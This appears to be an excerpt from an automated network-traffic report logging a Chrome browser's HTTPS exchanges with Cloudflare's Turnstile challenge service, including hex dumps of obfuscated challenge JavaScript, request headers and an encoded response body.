                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 2c 67 62 2c 67 63 2c 67 64 2c 67 6e 2c 67 79 2c 67 43 2c 67 44 2c 67 45 2c 66 35 2c 66 36 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 31 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 35 35 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 30 36 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 32 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 38 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 30 36 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 32 32 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74
                                                                                              Data Ascii: ,gb,gc,gd,gn,gy,gC,gD,gE,f5,f6){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1441))/1*(-parseInt(gI(955))/2)+parseInt(gI(1306))/3*(parseInt(gI(1212))/4)+parseInt(gI(1388))/5+parseInt(gI(1606))/6*(-parseInt(gI(822))/7)+-parseInt
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 65 28 34 39 30 29 5d 5b 68 65 28 34 34 32 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 65 28 35 35 33 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 31 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 65 28 31 33 32 35 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 65 28 31 31 36 36 29 5d 28 68 65 28 31 37 34 34 29 2c 69 2b 44 29 3f 6f 5b 68 65 28 35 39 32 29 5d 28 73 2c 6f 5b 68 65 28 31 37 30 36 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 68 65 28 35 39 32 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 68 65 28 38 39 32 29 5d 28 73 2c 6f 5b 68 65 28 31 32 39 30 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75
                                                                                              Data Ascii: B='nAsAaAb'.split('A'),B=B[he(490)][he(442)](B),C=0;C<x[he(553)];D=x[C],E=f1(g,h,D),B(E)?(F=E==='s'&&!g[he(1325)](h[D]),o[he(1166)](he(1744),i+D)?o[he(592)](s,o[he(1706)](i,D),E):F||o[he(592)](s,i+D,h[D])):o[he(892)](s,o[he(1290)](i,D),E),C++);return j;fu
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 27 63 6f 64 65 27 3a 68 4e 28 31 35 35 35 29 2c 27 72 63 56 27 3a 65 4d 5b 68 4e 28 31 30 39 30 29 5d 5b 68 4e 28 38 35 31 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 33 39 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 4f 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 6b 3d 28 68 4f 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 4f 28 31 32 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 7d 2c 6a 5b 68 4f 28 38 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 7c 7c 48 7d 2c 6a 5b 68 4f 28 31 35 31 31 29 5d 3d 68 4f 28 31 34 31 34 29 2c 6a 5b 68 4f 28 38 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e
                                                                                              Data Ascii: 'code':hN(1555),'rcV':eM[hN(1090)][hN(851)]},'*'))},g)},eM[gJ(1391)]=function(g,h,i,hO,j,k,l,m,n,o,s,x,B,C,D,E,F){k=(hO=gJ,j={},j[hO(1278)]=function(G,H){return G instanceof H},j[hO(808)]=function(G,H){return G||H},j[hO(1511)]=hO(1414),j[hO(852)]=function
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 3d 4a 53 4f 4e 5b 68 4f 28 37 36 39 29 5d 28 44 29 2c 46 3d 67 44 5b 68 4f 28 31 37 30 39 29 5d 28 45 29 5b 68 4f 28 31 30 32 30 29 5d 28 27 2b 27 2c 6b 5b 68 4f 28 31 36 30 35 29 5d 29 2c 42 5b 68 4f 28 31 30 35 36 29 5d 28 6b 5b 68 4f 28 31 32 36 36 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 4f 28 31 30 39 30 29 5d 5b 68 4f 28 35 31 32 29 5d 2c 27 3d 27 29 2b 46 29 7d 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 34 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 68 50 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6f 2c 73 2c 76 2c 6d 29 7b 28 68 50 3d 67 4a 2c 65 3d 7b 27 62 4b 63 75 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 59 49 42 70 79 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65
                                                                                              Data Ascii: =JSON[hO(769)](D),F=gD[hO(1709)](E)[hO(1020)]('+',k[hO(1605)]),B[hO(1056)](k[hO(1266)]('v_'+eM[hO(1090)][hO(512)],'=')+F)}catch(G){}},eM[gJ(441)]=function(d,hP,e,f,g,h,i,j,k,l,o,s,v,m){(hP=gJ,e={'bKcuC':function(n,o){return o===n},'YIBpy':function(n,o){re
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 37 31 30 29 5d 3d 66 44 2c 66 46 3d 65 4d 5b 67 4a 28 31 30 39 30 29 5d 5b 67 4a 28 31 33 37 30 29 5d 5b 67 4a 28 31 30 39 34 29 5d 2c 66 47 3d 65 4d 5b 67 4a 28 31 30 39 30 29 5d 5b 67 4a 28 31 33 37 30 29 5d 5b 67 4a 28 31 31 32 39 29 5d 2c 66 48 3d 65 4d 5b 67 4a 28 31 30 39 30 29 5d 5b 67 4a 28 31 33 37 30 29 5d 5b 67 4a 28 33 39 30 29 5d 2c 66 54 3d 21 5b 5d 2c 67 35 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 34 35 39 29 5d 28 67 4a 28 34 34 37 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 50 2c 64 2c 65 29 7b 69 50 3d 67 4a 2c 64 3d 7b 27 76 77 57 4f 70 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 76 5a 4b 52 69 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 66 7d 2c 27 4c
                                                                                              Data Ascii: 710)]=fD,fF=eM[gJ(1090)][gJ(1370)][gJ(1094)],fG=eM[gJ(1090)][gJ(1370)][gJ(1129)],fH=eM[gJ(1090)][gJ(1370)][gJ(390)],fT=![],g5=undefined,eM[gJ(1459)](gJ(447),function(c,iP,d,e){iP=gJ,d={'vwWOp':function(f){return f()},'vZKRi':function(f,g){return g===f},'L
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 2c 27 4e 59 6f 61 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 70 6d 42 43 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6b 68 6c 51 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 61 78 6c 69 4e 27 3a 6a 70 28 34 31 32 29 2c 27 6a 50 49 49 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 7a 6d 73 56 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 46 46 44 6a 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 41 6d 4e 4a 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c
                                                                                              Data Ascii: ,'NYoax':function(h,i){return h==i},'pmBCJ':function(h,i){return h<i},'khlQF':function(h,i){return h+i},'axliN':jp(412),'jPIIa':function(h,i){return i|h},'zmsVR':function(h,i){return h==i},'FFDjA':function(h,i){return h(i)},'AmNJs':function(h,i){return h<
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 6a 70 28 37 31 37 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 71 29 7b 72 65 74 75 72 6e 20 6a 71 3d 6a 70 2c 64 5b 6a 71 28 31 37 35 30 29 5d 3d 3d 3d 64 5b 6a 71 28 33 39 32 29 5d 3f 76 6f 69 64 20 30 3a 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 6a 72 29 7b 72 65 74 75 72 6e 20 6a 72 3d 6a 71 2c 6a 72 28 31 36 39 34 29 5b 6a 72 28 31 32 34 30 29 5d 28 6a 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 73 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 6a 73 3d 6a 70 2c 64 5b
                                                                                              Data Ascii: M':function(h,i){return h===i}},e=String[jp(717)],f={'h':function(h,jq){return jq=jp,d[jq(1750)]===d[jq(392)]?void 0:h==null?'':f.g(h,6,function(j,jr){return jr=jq,jr(1694)[jr(1240)](j)})},'g':function(i,j,o,js,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O){if(js=jp,d[
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 53 74 72 69 6e 67 2c 4b 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 69 66 28 64 5b 6a 73 28 37 35 30 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 73 28 37 34 34 29 5d 5b 6a 73 28 33 35 32 29 5d 5b 6a 73 28 39 38 30 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 6a 73 28 34 34 39 29 5d 28 32 35 36 2c 43 5b 6a 73 28 31 34 30 32 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 6a 73 28 31 33 35 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 73 28 31 32 31 30 29 5d 28 64 5b 6a 73 28 31 37 32 36 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 73 28 31 34 30 32 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 2e 36 32 7c 64 5b 6a 73 28
                                                                                              Data Ascii: String,K);continue}break}if(d[js(750)]('',C)){if(Object[js(744)][js(352)][js(980)](B,C)){if(d[js(449)](256,C[js(1402)](0))){for(s=0;s<F;H<<=1,I==d[js(1350)](j,1)?(I=0,G[js(1210)](d[js(1726)](o,H)),H=0):I++,s++);for(O=C[js(1402)](0),s=0;8>s;H=H<<1.62|d[js(


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.649776104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:04 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 3269
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                              CF-Chl-RetryAttempt: 0
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              CF-Challenge: 7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Origin: https://challenges.cloudflare.com
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:04 UTC3269OUTData Raw: 76 5f 38 66 34 37 63 37 37 31 38 66 36 32 34 33 38 36 3d 31 51 62 65 77 65 6f 65 39 65 57 65 34 65 5a 43 55 4a 43 55 6b 32 52 6b 52 73 61 24 52 61 55 52 32 33 73 78 52 39 33 55 35 43 55 33 78 46 55 76 7a 65 78 67 63 6b 7a 67 77 53 51 52 25 32 62 55 4f 32 6f 78 55 64 6f 65 55 50 68 55 61 4c 71 55 24 6c 32 55 73 62 53 65 35 7a 55 71 65 6f 77 6c 55 34 43 67 6f 55 39 55 61 37 6d 55 76 71 75 47 64 55 61 6c 50 4c 72 68 55 70 79 4f 62 6e 30 53 6a 67 61 43 44 51 6e 51 58 6e 52 70 69 67 6f 6b 53 55 35 62 55 66 65 55 57 52 31 37 30 68 4f 67 53 55 35 6b 49 37 69 32 6f 24 65 65 4e 6a 65 4a 50 6c 73 4f 7a 62 63 61 7a 55 33 6b 33 69 53 43 51 55 63 37 79 57 65 6f 30 6f 52 65 55 46 65 6f 53 55 39 47 6f 77 65 61 6f 70 70 46 33 6b 65 52 53 42 55 63 54 6b 71 4b 53 50 61 63
                                                                                              Data Ascii: v_8f47c7718f624386=1Qbeweoe9eWe4eZCUJCUk2RkRsa$RaUR23sxR93U5CU3xFUvzexgckzgwSQR%2bUO2oxUdoeUPhUaLqU$l2UsbSe5zUqeowlU4CgoU9Ua7mUvquGdUalPLrhUpyObn0SjgaCDQnQXnRpigokSU5bUfeUWR170hOgSU5kI7i2o$eeNjeJPlsOzbcazU3k3iSCQUc7yWeo0oReUFeoSU9GoweaoppF3keRSBUcTkqKSPac
                                                                                              2024-12-19 13:36:04 UTC747INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:04 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 149552
                                                                                              Connection: close
                                                                                              cf-chl-gen: 6Ttpl741nVT1ezlA53QwTgYI/1VNfQTiBZ/tb/pB7Vaxf4R7Ez7c9OzNtG0z5CTc6C+nwilpbeIHpffjl8wlpXAJ1HwqPQUNhHAZBYl9uPQGt9rxtEEFgap2QcB+r/KnJuV4zqd6da140tZ3H6+DZ3CgLANt2wEYrzkTHk+112IR8kHFN2zJS010x1+fzrVd3ReHqEV9AkH32n9rsGPrYBpXMECM1WqzhSFtRrq7/5HsO/XVNvBFVSfX7MrFjXl8BXOk9Vcef0604QleOw+jvB0B2KfsCzwhlek4JzFz1YOA1Dd5d+zhF978HITpxa4whq7C/J6/kZPwBcn1tWyF8MkIUxdIW7ZywBQ/Wp5rbmCO6Z+h4KhPCVmYC+wielJnFJvZg5gMXI/8GvHUgDpGNAWbdzK2+2rufH5baXKS/IefwMQW7GfIF1KpyB6YLfJ4pSzvm77jeh0f1Ev1tWeg6EuSOl3Llw1eQ4MwRwUqPoUCmmI=$qzW9VWanaPJFxJYv
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c78b3e81f78d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:04 UTC622INData Raw: 57 6d 35 71 64 34 46 68 5a 30 57 43 5a 70 46 58 6d 57 5a 74 65 5a 74 79 63 58 52 59 59 4b 4e 76 6f 34 52 6c 63 5a 65 64 6f 6e 69 58 6f 70 61 58 61 61 69 51 6e 34 53 74 6c 59 4f 34 6a 72 61 37 70 36 61 62 72 6e 75 31 6d 33 57 73 75 72 47 34 73 37 57 54 75 34 69 34 69 4c 6d 4c 76 73 53 51 6c 4d 47 72 78 35 50 47 31 35 65 57 74 4d 76 4a 6f 4a 65 31 6f 61 44 69 78 64 66 49 35 62 36 2f 71 63 50 4b 77 36 33 48 79 65 43 2f 79 76 65 31 75 4b 2f 5a 37 74 7a 35 32 75 43 32 32 4e 62 6a 32 62 76 6c 2b 65 67 47 39 77 4c 47 34 73 6a 4b 79 75 62 49 43 50 54 71 39 41 45 4e 46 4f 51 63 45 74 6f 61 33 68 49 41 44 75 76 79 34 2b 4c 6a 33 77 63 6b 46 43 34 44 48 41 7a 6e 48 51 59 54 4b 76 55 30 49 44 63 4e 38 68 76 37 46 41 63 70 43 77 38 5a 44 7a 51 62 45 52 77 39 52 68 6b
                                                                                              Data Ascii: Wm5qd4FhZ0WCZpFXmWZteZtycXRYYKNvo4RlcZedoniXopaXaaiQn4StlYO4jra7p6abrnu1m3WsurG4s7WTu4i4iLmLvsSQlMGrx5PG15eWtMvJoJe1oaDixdfI5b6/qcPKw63HyeC/yve1uK/Z7tz52uC22Nbj2bvl+egG9wLG4sjKyubICPTq9AENFOQcEtoa3hIADuvy4+Lj3wckFC4DHAznHQYTKvU0IDcN8hv7FAcpCw8ZDzQbERw9Rhk
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 45 64 50 55 39 42 50 54 34 39 52 55 42 6f 58 54 30 39 52 69 5a 6e 55 6b 51 2b 63 30 52 50 5a 32 39 59 56 31 56 32 53 33 5a 4a 64 7a 79 43 66 58 39 56 55 32 56 5a 65 34 52 55 64 31 56 59 52 32 4b 42 59 32 52 7a 6c 49 56 30 64 5a 70 6d 56 34 61 61 56 49 74 64 6c 35 71 41 63 47 46 32 63 6c 2b 4b 5a 6f 4b 65 70 48 35 71 62 34 52 73 6a 4b 47 6a 64 4b 71 47 64 62 71 6b 72 4b 36 79 72 70 61 37 6d 58 6d 6a 77 35 47 64 71 4d 71 49 6f 61 4f 69 75 37 79 6f 7a 6f 33 51 78 61 66 57 6b 61 58 43 6b 74 79 36 32 62 53 71 76 4e 71 32 72 73 53 7a 74 62 53 6c 31 75 71 2f 36 36 62 49 37 75 50 50 34 72 4b 78 30 38 43 75 74 39 66 45 73 72 50 62 79 4c 66 51 33 38 79 37 32 4f 50 51 76 39 44 6e 31 4d 4c 73 36 39 6a 47 2b 75 2f 63 79 75 7a 7a 34 4d 37 30 39 2b 54 53 46 52 49 65 39
                                                                                              Data Ascii: EdPU9BPT49RUBoXT09RiZnUkQ+c0RPZ29YV1V2S3ZJdzyCfX9VU2VZe4RUd1VYR2KBY2RzlIV0dZpmV4aaVItdl5qAcGF2cl+KZoKepH5qb4RsjKGjdKqGdbqkrK6yrpa7mXmjw5GdqMqIoaOiu7yozo3QxafWkaXCkty62bSqvNq2rsSztbSl1uq/66bI7uPP4rKx08Cut9fEsrPbyLfQ38y72OPQv9Dn1MLs69jG+u/cyuzz4M709+TSFRIe9
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 66 58 31 45 38 4e 7a 6b 72 4b 53 64 4e 4b 45 63 7a 63 6d 31 4b 4b 54 4e 6c 57 48 70 6e 53 7a 74 2f 57 7a 70 63 67 57 46 6a 64 6b 5a 2b 66 59 6c 68 57 30 5a 6f 6a 59 70 68 6b 48 36 4d 63 48 56 74 65 57 4f 46 59 30 36 58 61 46 68 76 58 4b 42 74 67 33 31 6a 68 6c 2b 58 6e 71 64 6d 64 57 42 71 5a 33 6d 6e 6a 32 31 39 68 62 46 78 67 59 6c 36 64 59 57 4f 6c 6f 68 36 73 36 36 57 6e 4b 61 79 68 71 4b 72 70 71 79 56 76 35 32 34 77 70 4b 78 76 4d 53 31 70 63 66 51 6c 74 54 50 79 74 43 75 74 75 47 33 33 4c 4b 66 34 37 7a 64 73 73 6d 71 71 37 65 34 72 65 75 72 77 65 72 43 72 62 43 31 36 4c 48 32 34 37 58 77 2f 66 48 54 31 50 33 38 2b 50 4c 2b 76 77 4c 32 36 73 66 5a 78 73 73 45 2b 78 48 78 43 4d 77 49 2f 75 54 56 35 66 72 35 45 41 72 2b 37 64 4c 33 46 51 51 51 49 52
                                                                                              Data Ascii: fX1E8NzkrKSdNKEczcm1KKTNlWHpnSzt/WzpcgWFjdkZ+fYlhW0ZojYphkH6McHVteWOFY06XaFhvXKBtg31jhl+XnqdmdWBqZ3mnj219hbFxgYl6dYWOloh6s66WnKayhqKrpqyVv524wpKxvMS1pcfQltTPytCutuG33LKf47zdssmqq7e4reurwerCrbC16LH247Xw/fHT1P38+PL+vwL26sfZxssE+xHxCMwI/uTV5fr5EAr+7dL3FQQQIR
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 53 47 64 5a 50 53 31 67 56 55 68 41 64 57 6c 43 4d 33 4a 52 5a 32 74 4d 59 57 39 4d 50 31 78 32 68 6e 4e 35 59 56 39 6d 56 6c 35 49 65 31 74 35 5a 57 39 64 55 32 4a 6b 55 56 61 5a 62 59 6c 36 68 32 79 67 57 32 74 38 6f 4a 65 64 70 34 42 6e 6d 59 71 68 68 59 79 70 61 61 46 71 69 4b 43 6b 70 49 4b 70 6b 48 4b 57 68 62 52 35 75 5a 6c 39 73 58 75 4e 6e 4d 47 39 67 6f 53 35 78 61 61 31 77 63 62 44 71 61 2b 4f 30 5a 53 6e 6f 72 50 47 6a 49 33 5a 75 70 61 65 76 38 71 66 34 74 6a 41 74 4e 32 6b 32 64 4f 37 70 4b 6e 4e 72 72 75 73 7a 61 76 4f 39 72 50 6a 79 38 58 4b 79 4e 7a 5a 2b 74 66 53 2b 76 62 66 38 4e 33 33 42 77 72 65 39 2f 62 74 2f 4f 62 58 30 4f 76 61 44 4f 6b 44 45 42 55 54 30 4e 59 55 47 42 48 6e 44 76 6f 51 48 68 34 68 39 39 34 65 4a 76 77 72 39 2f 6b
                                                                                              Data Ascii: SGdZPS1gVUhAdWlCM3JRZ2tMYW9MP1x2hnN5YV9mVl5Ie1t5ZW9dU2JkUVaZbYl6h2ygW2t8oJedp4BnmYqhhYypaaFqiKCkpIKpkHKWhbR5uZl9sXuNnMG9goS5xaa1wcbDqa+O0ZSnorPGjI3Zupaev8qf4tjAtN2k2dO7pKnNrruszavO9rPjy8XKyNzZ+tfS+vbf8N33Bwre9/bt/ObX0OvaDOkDEBUT0NYUGBHnDvoQHh4h994eJvwr9/k
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 30 52 48 51 7a 5a 54 54 6d 6c 51 4d 30 6c 77 66 54 68 54 63 34 46 34 57 34 47 45 57 30 5a 39 5a 58 78 35 67 59 70 6b 58 47 64 6a 66 59 68 50 6c 6d 71 43 5a 31 6c 56 63 6d 2b 4e 6a 46 31 34 6c 4a 69 6c 58 6e 74 31 6f 4b 52 6d 6a 4b 74 73 71 33 78 73 62 49 61 4f 6c 71 4f 76 72 61 64 30 6a 62 71 64 74 59 43 35 6f 37 61 41 68 61 65 57 6c 62 32 71 76 34 4b 6e 6e 36 54 4d 78 74 44 41 30 63 43 33 30 39 58 55 6c 64 66 64 30 35 75 56 72 39 47 64 34 64 58 69 70 5a 6e 52 33 36 66 58 36 38 50 66 32 38 44 49 70 4e 33 4a 79 71 37 71 30 63 54 58 37 76 50 58 7a 39 7a 76 34 74 37 7a 78 4f 33 67 2f 4f 50 49 2b 63 6f 42 39 64 72 48 34 67 37 76 34 75 45 4b 44 39 41 55 45 4f 4c 30 45 2f 6a 59 36 76 67 57 46 66 6f 68 33 4f 37 67 47 79 41 64 41 77 73 73 2b 41 33 71 49 4f 73 6b
                                                                                              Data Ascii: 0RHQzZTTmlQM0lwfThTc4F4W4GEW0Z9ZXx5gYpkXGdjfYhPlmqCZ1lVcm+NjF14lJilXnt1oKRmjKtsq3xsbIaOlqOvrad0jbqdtYC5o7aAhaeWlb2qv4Knn6TMxtDA0cC309XUldfd05uVr9Gd4dXipZnR36fX68Pf28DIpN3Jyq7q0cTX7vPXz9zv4t7zxO3g/OPI+coB9drH4g7v4uEKD9AUEOL0E/jY6vgWFfoh3O7gGyAdAwss+A3qIOsk
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 4a 31 5a 7a 78 4a 61 6e 4e 59 50 6f 42 55 62 6b 47 44 56 57 42 6f 56 33 56 70 66 32 43 4c 62 57 36 47 67 6c 35 71 69 58 46 54 6a 47 57 55 57 5a 6d 62 58 5a 46 62 62 59 4b 6c 68 4a 4a 70 69 4a 68 33 6d 34 52 73 68 72 4a 6f 69 6f 4b 6b 69 4b 35 79 6b 37 47 4e 71 5a 61 6f 6a 5a 56 39 75 4d 43 5a 6a 70 31 39 76 61 6d 33 69 70 36 6e 70 6f 57 51 70 38 36 4e 72 73 6d 6f 69 62 53 53 32 70 62 56 30 62 65 74 72 5a 71 38 34 64 36 31 35 4e 4c 67 78 4d 6d 35 76 2b 58 76 75 74 72 62 35 71 6e 44 31 62 48 48 31 74 48 4d 35 4c 58 72 7a 50 4f 36 79 62 53 2b 75 38 33 37 35 4e 50 30 34 50 33 6b 41 38 62 74 45 50 73 4f 45 76 44 2b 44 75 6b 44 44 50 44 57 2b 64 6e 56 37 42 72 34 32 68 38 56 48 79 4d 68 43 50 34 62 4c 52 34 46 35 67 76 35 4b 65 30 75 44 76 45 6d 37 77 49 58 48
                                                                                              Data Ascii: J1ZzxJanNYPoBUbkGDVWBoV3Vpf2CLbW6Ggl5qiXFTjGWUWZmbXZFbbYKlhJJpiJh3m4RshrJoioKkiK5yk7GNqZaojZV9uMCZjp19vam3ip6npoWQp86NrsmoibSS2pbV0betrZq84d615NLgxMm5v+Xvutrb5qnD1bHH1tHM5LXrzPO6ybS+u8375NP04P3kA8btEPsOEvD+DukDDPDW+dnV7Br42h8VHyMhCP4bLR4F5gv5Ke0uDvEm7wIXH
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 43 58 6e 36 47 66 6f 4e 53 51 6f 52 30 68 32 65 47 54 6d 57 44 66 58 35 6a 68 6e 36 53 6d 59 56 59 68 32 2b 53 58 49 69 51 61 70 6d 4e 6c 32 2b 6c 66 4a 56 30 71 4b 61 63 70 6f 61 71 63 4a 32 72 72 57 75 67 6b 70 4b 6d 71 6e 71 75 74 61 36 36 75 6e 6d 36 65 4b 47 61 66 35 4b 67 67 63 57 48 6f 72 79 63 67 4c 69 2f 6f 37 44 4e 70 37 62 55 79 4b 66 4f 71 4b 4f 35 30 62 32 58 30 37 7a 63 6f 4c 69 33 30 62 50 47 70 2b 66 46 76 62 76 64 35 63 66 72 37 75 71 77 77 63 4c 58 7a 39 54 58 39 73 76 54 39 39 54 57 37 76 43 2b 78 41 54 2b 78 38 44 61 38 37 33 33 44 4f 34 50 44 64 37 53 37 51 66 6a 31 67 51 45 43 74 59 58 30 68 4c 59 44 50 76 62 33 53 49 68 37 2f 50 78 2b 2f 6f 56 46 75 6b 5a 49 75 33 36 49 65 76 75 4a 68 37 73 45 77 55 6e 4d 79 77 72 4b 78 41 4b 43 54
